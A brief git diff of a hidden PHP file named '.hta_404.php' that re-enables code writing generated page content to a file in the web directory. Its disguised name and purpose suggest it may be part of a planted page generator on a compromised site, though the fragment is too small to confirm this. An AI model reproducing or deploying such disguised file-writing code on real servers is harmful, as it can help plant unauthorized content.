diff --git a/.hta_404.php b/.hta_404.php index cfcf037..9eb64e6 100644 --- a/.hta_404.php +++ b/.hta_404.php @@ -21,11 +21,11 @@ $totalPageContent = $headerContent . $pageContent . $footerContent; $filePath = __DIR__ . '/' . $fileName; - // if (file_put_contents($filePath, $totalPageContent)) { - // // echo "
Page saved successfully at $filePath.
"; - // } else { - // // echo "Failed to save the page.
"; - // } + if (file_put_contents($filePath, $totalPageContent)) { + // echo "Page saved successfully at $filePath.
"; + } else { + // echo "Failed to save the page.
"; + } } try {